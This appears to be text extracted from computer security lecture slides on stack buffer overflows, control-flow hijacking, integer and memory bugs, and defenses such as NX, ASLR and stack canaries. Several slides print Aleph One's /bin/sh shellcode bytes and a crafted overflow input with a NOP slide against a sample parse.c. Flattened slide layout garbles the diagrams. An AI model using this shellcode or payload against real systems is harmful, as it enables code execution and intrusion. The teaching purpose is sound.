    59. 59. Basic Stack ExploitSo suppose we overflow with a string that looks like the assembly of: Shell Code: exec(“/bin/sh”) high Program P ShellCode To previous stack To previous stack frame pointer frame pointer arguments arguments return address crafted return address return address return address stack frame pointer stack frame pointer To the instruction To the instruction at which at which this this function was called charbuffer buf[128] function was called buffer low Dan Boneh “xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80 x31xdbx89xd8x40xcdx80xe8xdcxffxffxff/bin/sh” When the function exits, the user gets shell !!! (exact shell code by Aleph One) Note: shellcode runs in stack.
    60. 60. Basic Stack Exploitparse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address 5: i++; 0xbffff758 0x61616161 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url 8:} 0xbffff748 0x61616161 header_ok 0xbffff744 0x61616161 buf[4] 9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0] 10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125 11: fread(cmd, 1, 256, fp); . . . 12: int header_ok = 0; . . . . 0xbffff7d8 0xfffff764 cmd[25,26,27,28] . . . . . 19: url = cmd + 4; . . . 20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4] 0xbffff6c0 0x20544547 cmd[3,2,1,0] 21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url 22: return 0; } 0xbffff748 0x00000001 header_ok 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 outfile (input file) 0xbffff6b0 0xbffff6c4 in GET AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0 x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr 89xd8x40xcdx80xe8xdcxffxffxff/bin/sh 0xbffff69c 0x00000019 i (Unallocated)
    61. 61. Basic Stack Exploit OVERWRITE POINT!parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x08048564 return address 5: i++; 0xbffff758 0x61616161 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url 8:} 0xbffff748 0x61616161 header_ok 0xbffff744 0x61616161 buf[4] 9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0] 10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125 11: fread(cmd, 1, 256, fp); . . . 12: int header_ok = 0; . . . . 0xbffff7d8 0xfffff764 cmd[25,26,27,28] . . . . . 19: url = cmd + 4; . . . 20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4] 0xbffff6c0 0x20544547 cmd[3,2,1,0] 21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url 22: return 0; } 0xbffff748 0x00000001 header_ok 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 outfile (input file) 0xbffff6b0 0xbffff6c4 in GET AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0 x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr 89xd8x40xcdx80xe8xdcxffxffxff/bin/sh 0xbffff69c 0x00000019 i (Unallocated)
    62. 62. Basic Stack Exploit OVERWRITE POINT!parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x0804f764 return address 5: i++; 0xbffff758 0x61616161 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url 8:} 0xbffff748 0x61616161 header_ok 0xbffff744 0x61616161 buf[4] 9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0] 10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125 11: fread(cmd, 1, 256, fp); . . . 12: int header_ok = 0; . . . . 0xbffff7d8 0xfffff764 cmd[25,26,27,28] . . . . . 19: url = cmd + 4; . . . 20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4] 0xbffff6c0 0x20544547 cmd[3,2,1,0] 21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url 22: return 0; } 0xbffff748 0x00000001 header_ok 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 outfile (input file) 0xbffff6b0 0xbffff6c4 in GET AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0 x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr 89xd8x40xcdx80xe8xdcxffxffxff/bin/sh 0xbffff69c 0x00000019 i (Unallocated)
    63. 63. Basic Stack Exploit OVERWRITE POINT!parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x08fff764 return address 5: i++; 0xbffff758 0x61616161 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url 8:} 0xbffff748 0x61616161 header_ok 0xbffff744 0x61616161 buf[4] 9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0] 10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125 11: fread(cmd, 1, 256, fp); . . . 12: int header_ok = 0; . . . . 0xbffff7d8 0xfffff764 cmd[25,26,27,28] . . . . . 19: url = cmd + 4; . . . 20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4] 0xbffff6c0 0x20544547 cmd[3,2,1,0] 21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url 22: return 0; } 0xbffff748 0x00000001 header_ok 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 outfile (input file) 0xbffff6b0 0xbffff6c4 in GET AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0 x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr 89xd8x40xcdx80xe8xdcxffxffxff/bin/sh 0xbffff69c 0x00000019 i (Unallocated)
    64. 64. Basic Stack Exploit OVERWRITE POINT!parse.c 0xbffff764 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0xfffff764 return address 5: i++; 0xbffff758 0x61616161 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url 8:} 0xbffff748 0x61616161 header_ok 0xbffff744 0x61616161 buf[4] 9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0] 10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125 11: fread(cmd, 1, 256, fp); . . . 12: int header_ok = 0; . . . . 0xbffff7d8 0xfffff764 cmd[25,26,27,28] . . . . . 19: url = cmd + 4; . . . 20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4] 0xbffff6c0 0x20544547 cmd[3,2,1,0] 21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url 22: return 0; } 0xbffff748 0x00000001 header_ok 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 outfile (input file) 0xbffff6b0 0xbffff6c4 in GET AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0 x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr 89xd8x40xcdx80xe8xdcxffxffxff/bin/sh 0xbffff69c 0x00000019 i (Unallocated)
    65. 65. Basic Stack Exploit ACTIVATE POINT!parse.c shellcode 0xbffff764 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x61616161 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0xfffff764 return address 5: i++; 0xbffff758 0x61616161 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url 8:} 0xbffff748 0x61616161 header_ok 0xbffff744 0x61616161 buf[4] 9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0] 10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125 11: fread(cmd, 1, 256, fp); . . . 12: int header_ok = 0; . . . . 0xbffff7d8 0xfffff764 cmd[25,26,27,28] . . . . . 19: url = cmd + 4; . . . 20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4] 0xbffff6c0 0x20544547 cmd[3,2,1,0] 21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url 22: return 0; } 0xbffff748 0x00000001 header_ok 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 outfile (input file) 0xbffff6b0 0xbffff6c4 in GET AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0 x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr 89xd8x40xcdx80xe8xdcxffxffxff/bin/sh 0xbffff69c 0x00000019 i (Unallocated)
    66. 66. The NOP Slide Shellcode ---------------------------------------- NOP NOP To previous stack . . frame pointer . NOP arguments return address crafted return address stack frame pointer To the instruction at which this buffer function was called bufferProblem: how does attacker Solution: NOP slidedetermine ret-address? • Guess approximate stack state when the function is called • Insert many NOPs before Shell Code ‘/x90’
    67. 67. The NOP Slideparse.c 1:void copy_lower (char* in, char* out) { shellcode 2: int i = 0; 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 0x90909090 4: out[i] = tolower(in[i]); 0x90909090 5: i++; . . 6: } . 7: buf[i] = ‘0’; 0xbffff764 0x90909090 8:} 9:int parse(FILE *fp) { 0xbffff760 0x90909090 fp 10: char buf[5], *url, cmd[128]; return address 11: fread(cmd, 1, 256, fp); 0xbffff75c 0xfffff764 12: int header_ok = 0; stack frame ptr . 0xbffff758 0x61616161 . . 0xbffff74c url 19: url = cmd + 4; 0x61616161 0xbffff748 0x61616161 header_ok 20: copy_lower(url, buf); 21: printf(‚Location is %sn‛, buf); 0xbffff744 0x61616161 ?,?,?,buf[4] 22: return 0; } 0xbffff740 0x61616161 buf[3,2,1,0] 0xbffff73c 0x00000000 cmd[128,127,126,125] 23: /** main to load a file and run parse */ . . . . . . . . . 0xbffff6c4 0x41414141 cmd[7,6,5,4]file (input file) 0xbffff6c0 0x20544547 cmd[3,2,1,0] 0xbffff74c 0xbffff6c4 urlGET 0xbffff748 0x00000001 header_okAAAAAAAAAAAAAAAAAAAAx64xf7xffxff/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0x0bx89xf3x8dx4 (copy_lower)ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxffxff/bin/sh (Unallocated)
    68. 68. More on Stack Smashing• Some complications on Shellcode: – Shellcode should not contain the ‘0’ character. – Overflow should not crash program before the frame’s function exits• Sample remote stack smashing overflows: – (2007) Overflow in Windows animated cursors (ANI). LoadAniIcon() – (2005) Overflow in Symantic Virus Detection test.GetPrivateProfileString “file”, [long string] Dawn Song 68
    69. 69. Many unsafe libc functions strcpy (char *dest, const char *src) strcat (char *de st, const char *src) gets (char *s) scanf ( const char *format, … ) and many more.• “Safe” libc versions strncpy(), strncat() are misleading – e.g. strncpy() may leave string unterminated.• Windows C run time (CRT): – strcpy_s (*dest, DestSize, *src): ensures proper termination
    70. 70. General Control Hijacking: Return Address ShellCode To previous stack frame pointer arguments arguments return address crafted return address return address stack frame pointer stack frame pointer To the instruction at which this function was called buffer bufferOverwrite Step: Overwrite return address to point to your code.Activate Step: Return out of frame andDawn Song into your code. 70
    71. 71. General Control Hijacking: Local Fn Ptr ShellCode arguments arguments return address return address stack frame pointer stack frame pointer To instructions for a function local function pointer crafted local function pointer local function pointer buffer bufferOverwrite Step: Overwrite local function pointer to point to your code.Activate Step: Call that local function variable. Song Dawn 71
    72. 72. General Control Hijacking: Function Pointer in the Heap Object T vtable Object T vtable ptr FP1: method #1 ptr FP1: crafted FP1: shellcode method #1 FP2: method #2 FP2: crafted FP2: method #2 shellcode data FP3: method #3 data FP3: crafted FP3: method #3 shellcode buffer bufferOverwrite Step: Overwrite entries in a vtable for Object T.Activate Step: Call any method from Object T Song Dawn 72
    73. 73. General Control Hijacking: Function Pointer in the Heap (crafted vtable) crafted FP1: shellcode crafted FP2: shellcode Object T vtable crafted FP3: shellcode vtable ptr FP1: method #1 crafted ptr ptr FP1: method #1 FP2: method #2 FP2: method #2 data FP3: method #3 data FP3: method #3 buffer bufferOverwrite Step: Overwrite pointer to vtable on heap to point to a crafted vtable.Activate Step: Call any method from Object T Song Dawn 73
    74. 74. Attack: return-to-libc (arc injection)• Control hijacking without executing code (stack) (libc.so) arguments return address exec() stack frame pointer printf() buffer “/bin/shell” Dawn Song 74
    75. 75. General Control Hijacking Control Flow Pointer expected code return address frame pointer function pointer asexception Handler local variable shellcode, library jump to address longjmp pointer (return to libc) function pointer in heapOverwrite Step: Find some way to modify a Control Flow Pointer to point to your shellcode, library entry point, or other code of interest.Activate Step: Find some way to activate that modified Control Flow Pointer. Dawn Song 75
    76. 76. Instances of Control HijackingLocation in Control Flow How to activateMemory PointerStack Return Address Return from function (stack frame)Stack Frame Pointer Return from Ret Addr function Frame Ptr exception handersStack Function Pointers Reference and call local fn ptrs as local variables function pointer bufStack Exception Handler Trigger ExceptionHeap Function pointer in Reference and call Object T vtable Object T vtable heap (i.e. method function pointer ptr FP1: method #1 ptr FP1: method #1 of an object) FP2: method #2 FP2: method #2 data FP3: method #3 data FP3: method #3 buf bufAnywhere setjmp and longjmp Call longjmp program state longjmp saved pointer buffer … other data buf Dawn Song 76
    77. 77. Data HijackingModifying data in a way not intended Example: Authentication variable arguments arguments arguments return address return address return address stack frame pointer stack frame pointer stack frame pointer authentication_variable authentication_variable authentication_variable buffer buffer buffer Normal Situation: Exploited Situation: User types in a password which is stored in the to overflow if the user is successfully long enough buffer, and buffer and into the authenticated, the authentication_variableSong authentication_variable. The user Dawn is set. is now unintentionally authenticated. 77
    78. 78. Computer Security Course. Dawn Song Software Security (II): Other types of software vulnerabilities Dawn Song 78
    79. 79. Common Coding Errors• Input validation vulnerabilities• Memory management vulnerabilities• TOCTTOU vulnerabilities Dawn Song 79
    80. 80. Input validation vulnerabilities• Program requires certain assumptions on inputs to run properly• Without correct checking for inputs – Program gets exploited• Example: – Buffer overflow – Format string Dawn Song 80
    81. 81. Example Iunsigned int size;Data **datalist;size = GetUntrustedSizeValue();datalist = (data **)malloc(size * sizeof(Data *));for(int i=0; i<size; i++) { datalist[i] = InitData();}datalist[size] = NULL;... Dawn Song 81
    82. 82. Example II• char buf[80]; void vulnerable() { int len = read_int_from_network(); char *p = read_string_from_network(); if (len > sizeof buf) { error("length too large, nice try!"); return; } memcpy(buf, p, len); }• Whats wrong with this code?• Hint – memcpy() prototype: – void *memcpy(void *dest, const void *src, size_t n);• Definition of size_t: typedef unsigned int size_t;• Do you see it now? Dawn Song 82
    83. 83. Implicit Casting Bug• Attacker provides a negative value for len – if won’t notice anything wrong – Execute memcpy() with negative third arg – Third arg is implicitly cast to an unsigned int, and becomes a very large positive int – memcpy() copies huge amount of memory into buf, yielding a buffer overrun!• A signed/unsigned or an implicit casting bug – Very nasty – hard to spot• C compiler doesn’t warn about type mismatch between signed int and unsigned int – Silently inserts an implicit cast Dawn Song 83
    84. 84. Example III (Integer Overflow)• size_t len = read_int_from_network(); char *buf; buf = malloc(len+5); read(fd, buf, len); ...• What’s wrong with this code? – No buffer overrun problems (5 spare bytes) – No sign problems (all ints are unsigned)• But, len+5 can overflow if len is too large – If len = 0xFFFFFFFF, then len+5 is 4 – Allocate 4-byte buffer then read a lot more than 4 bytes into it: classic buffer overrun!• Know programming language’s semantics well to avoid pitfalls Dawn Song 84
    85. 85. Example IV char* ptr = (char*)malloc (SIZE); if (err) { abrt = 1; free(ptr); } ... if (abrt) { logError("operation aborted before commit", ptr); } • Use-after-free • Corrupt memoryhttp://cwe.mitre.org Dawn Song 85
    86. 86. Example IV char* ptr = (char*)malloc (SIZE); ... if (abrt) { free(ptr); } ... free(ptr); • Double-free error • Corrupts memory-management data structurehttp://owasp.org Dawn Song 86
    87. 87. What are software vulnerabilities?• Flaws in software• Break certain assumptions important for security – What assumptions broken in buffer overflow? Dawn Song 87
    88. 88. Why does software have vulnerabilities?• Programmers are humans! – Humans make mistakes!• Programmers were not security aware• Programming languages are not designed well for security Dawn Song 88
    89. 89. What can you do?• Programmers are humans! – Humans make mistakes! – Use tools! (next lecture)• Programmers were not security aware – Learn about different common classes of coding errors• Programming languages are not designed well for security – Pick better languages Dawn Song 89
    90. 90. Computer Security Course. Dawn Song Software Security (III): Buffer-overflow Defenses Dawn Song 90
    91. 91. Preventing hijacking attacksFix bugs:• Audit software • Automated tools: Coverity, Prefast/Prefix, Fortify• Rewrite software in a type-safe language (Java, ML) • Difficult for existing (legacy) code …Allow overflow, but prevent code executionAdd runtime code to detect overflows exploits:• Halt process when overflow exploit detected• StackGuard, Libsafe Dawn Song 91
    92. 92. Control-hijacking Attack Space Code Injection Arc InjectionStackHeapExceptionHandlers Dawn Song 92
    93. 93. Defense I: non-execute (W^X)Prevent attack code execution by marking stack andheap as non-executable• NX-bit on AMD Athlon 64, XD-bit on Intel P4 Prescott – NX bit in every Page Table Entry (PTE)• Deployment: – Linux (via PaX project); OpenBSD – Windows: since XP SP2 (DEP) • Boot.ini : /noexecute=OptIn or AlwaysOn • Visual Studio: /NXCompat[:NO] Dawn Song 93
    94. 94. Effectiveness and Limitations• Limitations: – Some apps need executable heap (e.g. JITs). – Does not defend against `return-to-libc’ exploits Code Injection Arc InjectionStack Non-Execute (NX)*Heap Non-Execute (NX)*Exception Non-Execute (NX)*Handlers * When Applicable Dawn Song 94
    95. 95. Defense II: Address RandomizationASLR: (Address Space Layout Randomization) -0xFFFFFFFF– Start stack at a random location Reserved for Kernal– Start heap at a random locatioin -0xC0000000– Map shared libraries to rand location in process unused user stack -0xBFF9AB20 memory user stack Attacker cannot jump directly to exec function– Deployment: (/DynamicBase) shared libraries • Windows Vista: 8 bits of randomness for DLLs shared libraries -0x40000000 – aligned to 64K page in a 16MB region 256 choices run time heap • Linux (via PaX): 16 bits of randomness for run time heap libraries static data segment– More effective on 64-bit architectures text segment (program) -0x08048000Other randomization methods: unused– Sys-call randomization: randomize sys-call id’s -0x00000000 Dawn Song– Instruction Set Randomization (ISR) 95
    96. 96. Effectiveness and Limitations• Limitations – Randomness is limited – Some vulnerabilities can allow secret to be leaked Code Injection Arc InjectionStack Non-Execute (NX)* ASLR ASLRHeap Non-Execute (NX)* ASLR ASLRException Non-Execute (NX)* ASLR ASLRHandlers * When Applicable Dawn Song 96
    97. 97. Defense III: StackGuard• Run time tests for stack integrity arguments• Embed “canaries” in stack frames return address stack frame pointer and verify their integrity prior to CANARY function return local variables Dawn Song 97
    98. 98. Canary Types• Random canary: – Random string chosen at program startup. – Insert canary string into every stack frame. – Verify canary before returning from function. • Exit program if canary changed. Turns potential exploit into DoS. – To exploit successfully, attacker must learn current random string.• Terminator canary: Canary = {0, newline, linefeed, EOF} – String functions will not copy beyond terminator. – Attacker cannot use string functions to corrupt stack. Dawn Song 98
    99. 99. StackGuard (Cont.)• StackGuard implemented as a GCC patch. – Program must be recompiled.• Low performance effects: 8% for Apache.• Note: Canaries don’t provide full proof protection. – Some stack smashing attacks leave canaries unchanged• Heap protection: PointGuard. – Protects function pointers and setjmp buffers by encrypting them: e.g. XOR with random cookie – Less effective, more noticeable performance effects Dawn Song 99
    100. 100. StackGuard enhancements: ProPolice• ProPolice (IBM) - gcc 3.4.1. (-fstack-protector) – Rearrange stack layout to prevent ptr overflow. String Growth arguments Protects pointer args and local return address pointers from a buffer overflow stack frame pointer CANARY local string buffers local string variables Stack Growth local non-buffer variables pointers, but no arrays copy of pointer args Dawn Song 100
    101. 101. MS Visual Studio /GS [since 2003] Compiler /GS option: – Combination of ProPolice and Random canary. – If cookie mismatch, default behavior is to call _exit(3)Function prolog: Function epilog: sub esp, 8 // allocate 8 bytes for cookie mov ecx, DWORD PTR [esp+8] mov eax, DWORD PTR ___security_cookie xor ecx, esp xor eax, esp // xor cookie with current esp call @__security_check_cookie@4 mov DWORD PTR [esp+8], eax // save in stack add esp, 8 Enhanced /GS in Visual Studio 2010: – /GS protection added to all functions, unless can be proven unnecessary Dawn Song 101
    102. 102. /GS stack frame String argumentsGrowth return address stack frame pointer Canary protects ret-addr and exception handlers exception handler frame CANARY local string buffers local string variables Stack local non-buffer pointers, but no arrays variablesGrowth Dawn Song 102
    103. 103. Effectiveness and Limitations• Limitation: – Evasion with exception handler * When Applicable Code Injection Arc InjectionStack Non-Execute (NX)* ASLR ASLR StacKGuard(Canaries) StacKGuard(Canaries) ProPolice ProPolice /GS /GSHeap Non-Execute (NX)* ASLR ASLR PointGuard PointGuardException Non-Execute (NX)* ASLR ASLRHandlers Dawn Song 103

    ×